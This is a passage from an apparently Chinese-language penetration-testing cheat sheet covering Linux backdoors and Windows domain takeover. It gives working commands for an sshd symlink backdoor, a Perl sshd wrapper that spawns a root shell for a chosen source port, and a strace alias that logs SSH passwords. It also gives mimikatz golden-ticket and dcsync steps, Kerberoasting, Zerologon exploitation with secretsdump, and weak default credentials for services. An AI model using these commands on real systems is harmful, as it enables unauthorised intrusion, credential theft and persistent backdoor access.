title="硬链接sshd"></a>硬链接sshd</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;</span></span></code></pre></div><p>链接:ssh <a href="mailto:root@192.168.206.142">root@192.168.206.142</a> -p 2333</p><h5 id="SSH-Server-wrapper"><a href="#SSH-Server-wrapper" class="headerlink" title="SSH Server wrapper"></a>SSH Server wrapper</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">cd /usr/sbin</span></span><span class="line"><span style="color: #babed8">mv sshd ../bin</span></span><span class="line"><span style="color: #babed8">echo '#!/usr/bin/perl' >sshd</span></span><span class="line"><span style="color: #babed8">echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd</span></span><span class="line"><span style="color: #babed8">echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd</span></span><span class="line"><span style="color: #babed8">chmod u+x sshd</span></span><span class="line"><span style="color: #babed8">//不用重启也行</span></span><span class="line"><span style="color: #babed8">/etc/init.d/sshd restart</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">socat STDIO TCP4:192.168.206.142:22,sourceport=13377</span></span></code></pre></div><h5 id="SSH-keylogger"><a href="#SSH-keylogger" class="headerlink" title="SSH keylogger"></a>SSH keylogger</h5><p>vim当前用户下的.bashrc文件,末尾添加</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'</span></span></code></pre></div><p>source .bashrc</p><h5 id="Cymothoa-进程注入backdoor"><a href="#Cymothoa-进程注入backdoor" class="headerlink" title="Cymothoa_进程注入backdoor"></a>Cymothoa_进程注入backdoor</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">./cymothoa -p 2270 -s 1 -y 7777</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nc -vv ip 7777</span></span></code></pre></div><h5 id="rootkit"><a href="#rootkit" class="headerlink" title="rootkit"></a>rootkit</h5><ul><li><a href="http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz">openssh_rootkit</a></li><li><a href="http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz">Kbeast_rootkit </a></li><li>Mafix + Suterusu rootkit</li></ul><h5 id="Tools"><a href="#Tools" class="headerlink" title="Tools"></a>Tools</h5><ul><li><a href="https://github.com/Screetsec/Vegile">Vegile </a></li><li><a href="https://github.com/icco/backdoor">backdoor </a></li></ul><h3 id="WEB后门"><a href="#WEB后门" class="headerlink" title="WEB后门"></a>WEB后门</h3><p>PHP Meterpreter后门<br>Aspx Meterpreter后门<br>weevely<br>webacoo<br>….</p><h2 id="横向渗透"><a href="#横向渗透" class="headerlink" title="横向渗透"></a>横向渗透</h2><h3 id="端口渗透"><a href="#端口渗透" class="headerlink" title="端口渗透"></a>端口渗透</h3><h4 id="端口扫描-1"><a href="#端口扫描-1" class="headerlink" title="端口扫描"></a>端口扫描</h4><ul><li>1.端口的指纹信息(版本信息) </li><li>2.端口所对应运行的服务 </li><li>3.常见的默认端口号 </li><li>4.尝试弱口令</li></ul><h4 id="端口爆破"><a href="#端口爆破" class="headerlink" title="端口爆破"></a>端口爆破</h4><p><a href="https://github.com/vanhauser-thc/thc-hydra">hydra </a></p><h4 id="端口弱口令"><a href="#端口弱口令" class="headerlink" title="端口弱口令"></a>端口弱口令</h4><ul><li>NTScan </li><li>Hscan </li><li>自写脚本</li></ul><h4 id="端口溢出"><a href="#端口溢出" class="headerlink" title="端口溢出"></a>端口溢出</h4><p><strong>smb</strong></p><ul><li>ms08067 </li><li>ms17010 </li><li>ms11058 </li><li>…</li></ul><p><strong>apache</strong><br><strong>ftp</strong><br><strong>…</strong></p><h4 id="常见的默认端口"><a href="#常见的默认端口" class="headerlink" title="常见的默认端口"></a>常见的默认端口</h4><h5 id="1、web类-web漏洞-敏感目录"><a href="#1、web类-web漏洞-敏感目录" class="headerlink" title="1、web类(web漏洞/敏感目录)"></a>1、web类(web漏洞/敏感目录)</h5><p>第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix …</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">80 web </span></span><span class="line"><span style="color: #babed8">80-89 web </span></span><span class="line"><span style="color: #babed8">8000-9090 web </span></span></code></pre></div><h5 id="2、数据库类-扫描弱口令"><a href="#2、数据库类-扫描弱口令" class="headerlink" title="2、数据库类(扫描弱口令)"></a>2、数据库类(扫描弱口令)</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">1433 MSSQL </span></span><span class="line"><span style="color: #babed8">1521 Oracle </span></span><span class="line"><span style="color: #babed8">3306 MySQL </span></span><span class="line"><span style="color: #babed8">5432 PostgreSQL </span></span><span class="line"><span style="color: #babed8">50000 DB2</span></span></code></pre></div><h5 id="3、特殊服务类-未授权-命令执行类-漏洞"><a href="#3、特殊服务类-未授权-命令执行类-漏洞" class="headerlink" title="3、特殊服务类(未授权/命令执行类/漏洞)"></a>3、特殊服务类(未授权/命令执行类/漏洞)</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">443 SSL心脏滴血 </span></span><span class="line"><span style="color: #babed8">445 ms08067/ms11058/ms17010等 </span></span><span class="line"><span style="color: #babed8">873 Rsync未授权 </span></span><span class="line"><span style="color: #babed8">5984 CouchDB http://xxx:5984/_utils/ </span></span><span class="line"><span style="color: #babed8">6379 redis未授权 </span></span><span class="line"><span style="color: #babed8">7001,7002 WebLogic默认弱口令,反序列 </span></span><span class="line"><span style="color: #babed8">9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 </span></span><span class="line"><span style="color: #babed8">11211 memcache未授权访问 </span></span><span class="line"><span style="color: #babed8">27017,27018 Mongodb未授权访问 </span></span><span class="line"><span style="color: #babed8">50000 SAP命令执行 </span></span><span class="line"><span style="color: #babed8">50070,50030 hadoop默认端口未授权访问 </span></span></code></pre></div><h5 id="4、常用端口类-扫描弱口令-端口爆破"><a href="#4、常用端口类-扫描弱口令-端口爆破" class="headerlink" title="4、常用端口类(扫描弱口令/端口爆破)"></a>4、常用端口类(扫描弱口令/端口爆破)</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">21 ftp </span></span><span class="line"><span style="color: #babed8">22 SSH </span></span><span class="line"><span style="color: #babed8">23 Telnet </span></span><span class="line"><span style="color: #babed8">445 SMB弱口令扫描 </span></span><span class="line"><span style="color: #babed8">2601,2604 zebra路由,默认密码zebra </span></span><span class="line"><span style="color: #babed8">3389 远程桌面 </span></span></code></pre></div><h5 id="5、端口合计所对应的服务"><a href="#5、端口合计所对应的服务" class="headerlink" title="5、端口合计所对应的服务"></a>5、端口合计所对应的服务</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">21 ftp </span></span><span class="line"><span style="color: #babed8">22 SSH </span></span><span class="line"><span style="color: #babed8">23 Telnet </span></span><span class="line"><span style="color: #babed8">25 SMTP </span></span><span class="line"><span style="color: #babed8">53 DNS </span></span><span class="line"><span style="color: #babed8">69 TFTP </span></span><span class="line"><span style="color: #babed8">80 web </span></span><span class="line"><span style="color: #babed8">80-89 web </span></span><span class="line"><span style="color: #babed8">110 POP3 </span></span><span class="line"><span style="color: #babed8">135 RPC </span></span><span class="line"><span style="color: #babed8">139 NETBIOS </span></span><span class="line"><span style="color: #babed8">143 IMAP </span></span><span class="line"><span style="color: #babed8">161 SNMP </span></span><span class="line"><span style="color: #babed8">389 LDAP </span></span><span class="line"><span style="color: #babed8">443 SSL心脏滴血以及一些web漏洞测试 </span></span><span class="line"><span style="color: #babed8">445 SMB </span></span><span class="line"><span style="color: #babed8">512,513,514 Rexec </span></span><span class="line"><span style="color: #babed8">873 Rsync未授权 </span></span><span class="line"><span style="color: #babed8">1025,111 NFS </span></span><span class="line"><span style="color: #babed8">1080 socks </span></span><span class="line"><span style="color: #babed8">1158 ORACLE EMCTL2601,2604 zebra路由,默认密码zebra案 </span></span><span class="line"><span style="color: #babed8">1433 MSSQL (暴力破解) </span></span><span class="line"><span style="color: #babed8">1521 Oracle:(iSqlPlus Port:5560,7778) </span></span><span class="line"><span style="color: #babed8">2082/2083 cpanel主机管理系统登陆 (国外用较多) </span></span><span class="line"><span style="color: #babed8">2222 DA虚拟主机管理系统登陆 (国外用较多) </span></span><span class="line"><span style="color: #babed8">2601,2604 zebra路由,默认密码zebra </span></span><span class="line"><span style="color: #babed8">3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了 </span></span><span class="line"><span style="color: #babed8">3306 MySQL (暴力破解) </span></span><span class="line"><span style="color: #babed8">3312/3311 kangle主机管理系统登陆 </span></span><span class="line"><span style="color: #babed8">3389 远程桌面 </span></span><span class="line"><span style="color: #babed8">3690 svn </span></span><span class="line"><span style="color: #babed8">4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 </span></span><span class="line"><span style="color: #babed8">4848 GlassFish web中间件 弱口令:admin/adminadmin </span></span><span class="line"><span style="color: #babed8">5432 PostgreSQL </span></span><span class="line"><span style="color: #babed8">5900 vnc </span></span><span class="line"><span style="color: #babed8">5984 CouchDB http://xxx:5984/_utils/ </span></span><span class="line"><span style="color: #babed8">6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 </span></span><span class="line"><span style="color: #babed8">6379 redis未授权 </span></span><span class="line"><span style="color: #babed8">7001,7002 WebLogic默认弱口令,反序列 </span></span><span class="line"><span style="color: #babed8">7778 Kloxo主机控制面板登录 </span></span><span class="line"><span style="color: #babed8">8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 </span></span><span class="line"><span style="color: #babed8">8080 tomcat/WDCd/ 主机管理系统,默认弱口令 </span></span><span class="line"><span style="color: #babed8">8080,8089,9090 JBOSS </span></span><span class="line"><span style="color: #babed8">8081 Symantec AV/Filter for MSE </span></span><span class="line"><span style="color: #babed8">8083 Vestacp主机管理系统 (国外用较多) </span></span><span class="line"><span style="color: #babed8">8649 ganglia </span></span><span class="line"><span style="color: #babed8">8888 amh/LuManager 主机管理系统默认端口 </span></span><span class="line"><span style="color: #babed8">9000 fcgi fcig php执行 </span></span><span class="line"><span style="color: #babed8">9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager </span></span><span class="line"><span style="color: #babed8">9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 </span></span><span class="line"><span style="color: #babed8">10000 Virtualmin/Webmin 服务器虚拟主机管理系统 </span></span><span class="line"><span style="color: #babed8">11211 memcache未授权访问 </span></span><span class="line"><span style="color: #babed8">27017,27018 Mongodb未授权访问 </span></span><span class="line"><span style="color: #babed8">28017 mongodb统计页面 </span></span><span class="line"><span style="color: #babed8">50000 SAP命令执行 </span></span><span class="line"><span style="color: #babed8">50060 hadoop </span></span><span class="line"><span style="color: #babed8">50070,50030 hadoop默认端口未授权访问</span></span></code></pre></div><h3 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h3><h4 id="信息搜集-1"><a href="#信息搜集-1" class="headerlink" title="信息搜集"></a>信息搜集</h4><h5 id="powerview-ps1"><a href="#powerview-ps1" class="headerlink" title="powerview.ps1"></a>powerview.ps1</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Get-NetDomain - gets the name of the current user's domain</span></span><span class="line"><span style="color: #babed8">Get-NetForest - gets the forest associated with the current user's domain</span></span><span class="line"><span style="color: #babed8">Get-NetForestDomains - gets all domains for the current forest</span></span><span class="line"><span style="color: #babed8">Get-NetDomainControllers - gets the domain controllers for the current computer's domain</span></span><span class="line"><span style="color: #babed8">Get-NetCurrentUser - gets the current [domain\]username</span></span><span class="line"><span style="color: #babed8">Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)</span></span><span class="line"><span style="color: #babed8">Get-NetUserSPNs - gets all user ServicePrincipalNames</span></span><span class="line"><span style="color: #babed8">Get-NetOUs - gets data for domain organization units</span></span><span class="line"><span style="color: #babed8">Get-NetGUIDOUs - finds domain OUs linked to a specific GUID</span></span><span class="line"><span style="color: #babed8">Invoke-NetUserAdd - adds a local or domain user</span></span><span class="line"><span style="color: #babed8">Get-NetGroups - gets a list of all current groups in the domain</span></span><span class="line"><span style="color: #babed8">Get-NetGroup - gets data for each user in a specified domain group</span></span><span class="line"><span style="color: #babed8">Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts</span></span><span class="line"><span style="color: #babed8">Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts</span></span><span class="line"><span style="color: #babed8">Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts</span></span><span class="line"><span style="color: #babed8">Invoke-NetGroupUserAdd - adds a user to a specified local or domain group</span></span><span class="line"><span style="color: #babed8">Get-NetComputers - gets a list of all current servers in the domain</span></span><span class="line"><span style="color: #babed8">Get-NetFileServers - get a list of file servers used by current domain users</span></span><span class="line"><span style="color: #babed8">Get-NetShare - gets share information for a specified server</span></span><span class="line"><span style="color: #babed8">Get-NetLoggedon - gets users actively logged onto a specified server</span></span><span class="line"><span style="color: #babed8">Get-NetSessions - gets active sessions on a specified server</span></span><span class="line"><span style="color: #babed8">Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles</span></span><span class="line"><span style="color: #babed8">Get-NetConnections - gets active connections to a specific server resource (share)</span></span><span class="line"><span style="color: #babed8">Get-NetFiles - gets open files on a server</span></span><span class="line"><span style="color: #babed8">Get-NetProcesses - gets the remote processes and owners on a remote server</span></span></code></pre></div><p>PowerView-2.0-tricks:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">https://gist.github.com/HarmJ0y/3328d954607d71362e3c</span></span></code></pre></div><p>PowerView-3.0-tricks</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993</span></span></code></pre></div><h5 id="BloodHound"><a href="#BloodHound" class="headerlink" title="BloodHound"></a>BloodHound</h5><p><strong>获取某OU下所有机器信息</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8"> "name": "Find the specificed OU computers",</span></span><span class="line"><span style="color: #babed8"> "queryList": [</span></span><span class="line"><span style="color: #babed8"> {</span></span><span class="line"><span style="color: #babed8"> "final": false,</span></span><span class="line"><span style="color: #babed8"> "title": "Select a OU...",</span></span><span class="line"><span style="color: #babed8"> "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"</span></span><span class="line"><span style="color: #babed8"> },</span></span><span class="line"><span style="color: #babed8"> {</span></span><span class="line"><span style="color: #babed8"> "final": true,</span></span><span class="line"><span style="color: #babed8"> "query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p",</span></span><span class="line"><span style="color: #babed8"> "allowCollapse": true,</span></span><span class="line"><span style="color: #babed8"> "endNode": "{}"</span></span><span class="line"><span style="color: #babed8"> }</span></span><span class="line"><span style="color: #babed8"> ]</span></span><span class="line"><span style="color: #babed8"> }</span></span></code></pre></div><p><strong>自动标记owned用户及机器</strong></p><p><a href="https://github.com/Lz1y/SyncDog">SyncDog</a></p><h5 id="获取域内DNS信息"><a href="#获取域内DNS信息" class="headerlink" title="获取域内DNS信息"></a>获取域内DNS信息</h5><ul><li><a href="https://github.com/dirkjanm/adidnsdump">adidnsdump</a></li><li><a href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96">域渗透——DNS记录的获取</a><br></li></ul><h4 id="获取域控的方法"><a href="#获取域控的方法" class="headerlink" title="获取域控的方法"></a>获取域控的方法</h4><h5 id="SYSVOL"><a href="#SYSVOL" class="headerlink" title="SYSVOL"></a>SYSVOL</h5><p>SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。<br>相关阅读: </p><ul><li><a href="https://www.secpulse.com/archives/42175.html">寻找SYSVOL里的密码和攻击GPP(组策略偏好) </a></li><li><a href="http://blog.51cto.com/ycrsjxy/203095">Windows Server 2008 R2之四管理Sysvol文件夹 </a></li><li><a href="https://adsecurity.org/?p=2288">SYSVOL中查找密码并利用组策略首选项 </a></li><li><a href="https://xz.aliyun.com/t/1653">利用SYSVOL还原组策略中保存的密码</a></li></ul><h5 id="MS14-068-Kerberos"><a href="#MS14-068-Kerberos" class="headerlink" title="MS14-068 Kerberos"></a>MS14-068 Kerberos</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机</span></span></code></pre></div><p>利用mimikatz将工具得到的<a href="mailto:TGT_domainuser@SERVER.COM.ccache">TGT_domainuser@SERVER.COM.ccache</a>写入内存,创建缓存证书:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit</span></span><span class="line"><span style="color: #babed8">net use k: \pentest.comc$</span></span></code></pre></div><p>相关阅读 :</p><ul><li><a href="http://adsecurity.org/?p=676">Kerberos的工具包PyKEK</a> </li><li><a href="http://www.freebuf.com/vuls/56081.html">深入解读MS14-068漏洞</a></li><li><a href="https://adsecurity.org/?p=541">Kerberos的安全漏洞</a></li></ul><h5 id="SPN扫描"><a href="#SPN扫描" class="headerlink" title="SPN扫描"></a>SPN扫描</h5><p>Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。<br>SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。<br>SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。<br>相关阅读 :</p><ul><li><a href="https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/">非扫描式的SQL Server发现</a> </li><li><a href="https://adsecurity.org/?p=1508">SPN扫描</a> </li><li><a href="https://github.com/PyroTek3/PowerShell-AD-Recon">扫描SQLServer的脚本</a></li></ul><h5 id="Kerberos的黄金门票"><a href="#Kerberos的黄金门票" class="headerlink" title="Kerberos的黄金门票"></a>Kerberos的黄金门票</h5><p>在域上抓取的哈希</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::dcsync /domain:pentest.com /user:krbtgt</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">kerberos::purge</span></span><span class="line"><span style="color: #babed8">kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi</span></span><span class="line"><span style="color: #babed8">kerberos::ptt administrator.kiribi</span></span><span class="line"><span style="color: #babed8">kerberos::tgt</span></span><span class="line"><span style="color: #babed8">net use k: \pnet use k: \pentest.comc$</span></span></code></pre></div><p>相关阅读 :</p><ul><li><a href="https://adsecurity.org/?p=1640">https://adsecurity.org/?p=1640</a> </li><li><a href="http://bobao.360.cn/learning/detail/3564.html">域服务账号破解实践</a> </li><li><a href="https://blog.csdn.net/wulantian/article/details/42418231">Kerberos的认证原理</a> </li><li><a href="https://klionsec.github.io/2016/08/10/ntlm-kerberos/">深刻理解windows安全认证机制ntlm&Kerberos</a></li></ul><h5 id="Kerberos的银票务"><a href="#Kerberos的银票务" class="headerlink" title="Kerberos的银票务"></a>Kerberos的银票务</h5><p>黄金票据和白银票据的一些区别:<br>Golden Ticket:伪造<code>TGT</code>,可以获取<code>任何Kerberos</code>服务权限<br>银票:伪造TGS,<code>只能访问指定的服务</code><br>加密方式不同:<br>Golden Ticket由<code>krbtgt</code>的hash加密<br>Silver Ticket由<code>服务账号</code>(通常为计算机账户)Hash加密<br>认证流程不同:<br>金票在使用的过程需要同域控通信<br>银票在使用的过程不需要同域控通信<br>相关阅读 :</p><ul><li><a href="https://adsecurity.org/?p=2011">攻击者如何使用Kerberos的银票来利用系统</a> </li><li><a href="https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf">域渗透——Pass The Ticket</a></li></ul><h5 id="域服务账号破解"><a href="#域服务账号破解" class="headerlink" title="域服务账号破解"></a>域服务账号破解</h5><p>与上面SPN扫描类似的原理<br><a href="https://github.com/nidem/kerberoast">https://github.com/nidem/kerberoast</a><br>获取所有用作SPN的帐户</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">setspn -T PENTEST.com -Q */*</span></span></code></pre></div><p>从Mimikatz的RAM中提取获得的门票</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">kerberos::list /export</span></span></code></pre></div><p>用rgsrepcrack破解</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi</span></span></code></pre></div><h5 id="凭证盗窃"><a href="#凭证盗窃" class="headerlink" title="凭证盗窃"></a>凭证盗窃</h5><p>从搜集的密码里面找管理员的密码 </p><h5 id="NTLM-relay"><a href="#NTLM-relay" class="headerlink" title="NTLM relay"></a>NTLM relay</h5><ul><li><a href="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/">One API call away from Domain Admin</a></li><li><a href="https://github.com/dirkjanm/privexchange/">privexchange</a></li><li><a href="https://github.com/ridter/exchange2domain">Exchange2domain</a></li></ul><p>用于主动让目标机器发起NTLM请求的方法:</p><ul><li><a href="https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py">printerbug</a></li><li><a href="https://github.com/topotam/PetitPotam">PetitPotam</a></li></ul><p>Relay LDAP:</p><ul><li><a href="https://github.com/Ridter/CVE-2019-1040-dcpwn">CVE-2019-1040-dcpwn</a></li></ul><p>Relay AD CS/PKI:</p><ul><li><a href="https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/">AD CS/PKI template exploit</a></li></ul><p>集成几个利用的工具:</p><ul><li><a href="https://github.com/Ridter/Relayx">Relayx</a></li></ul><p>内网445端口转发:</p><ul><li><a href="https://github.com/praetorian-inc/PortBender">PortBender</a></li></ul><h5 id="Kerberos委派"><a href="#Kerberos委派" class="headerlink" title="Kerberos委派"></a>Kerberos委派</h5><ul><li><a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html">Wagging-the-Dog.html</a></li><li><a href="https://blog.harmj0y.net/activedirectory/s4u2pwnage/">s4u2pwnage</a></li><li><a href="https://xz.aliyun.com/t/2931">Attacking Kerberos Delegation</a></li><li><a href="https://adsecurity.org/?p=4056">用打印服务获取域控</a></li><li><a href="https://blog.harmj0y.net/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/">Computer Takeover</a></li><li><a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">Combining NTLM Relaying and Kerberos delegation</a></li><li><a href="https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/">CVE-2019-1040</a></li></ul><h5 id="地址解析协议"><a href="#地址解析协议" class="headerlink" title="地址解析协议"></a>地址解析协议</h5><p>实在搞不定再搞ARP </p><h5 id="Zerologon"><a href="#Zerologon" class="headerlink" title="Zerologon"></a>Zerologon</h5><p>1、利用Mimikatz<br><strong>check</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::zerologon /target:dc1.exploit.local /account:dc1$</span></span></code></pre></div><p><strong>exploit</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit</span></span></code></pre></div><p><strong>dcsync</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt</span></span></code></pre></div><p><strong>restore</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">lsadump::postzerologon /target:conttosson.locl /account:dc$ </span></span></code></pre></div><p>2、利用impacket:</p><ul><li>取目标主机名+IP</li><li>install 修改版本的impacket</li><li>Exp</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python cve-2020-1472-exploit.py DC2008 10.211.55.200</span></span></code></pre></div><p><img src="https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190137.png"></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">secretsdump.py -no-pass cgdomain.com/'DC2008$'@10.211.55.200 -history -just-dc-user administrator</span></span></code></pre></div><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">secretsdump.py -no-pass cgdomain.com/administrator@10.211.55.200 -hashes aad3b435b51404eeaad3b435b51404ee:3add1560657a19b3166247eb3eb149ae</span></span></code></pre></div><p><img src="https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190359.png"></p><p>获取到旧的密码明文hex,还原</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">python restorepassword.py cgdomain.com/DC2008@DC2008 -target-ip 10.211.55.200 -hexpass 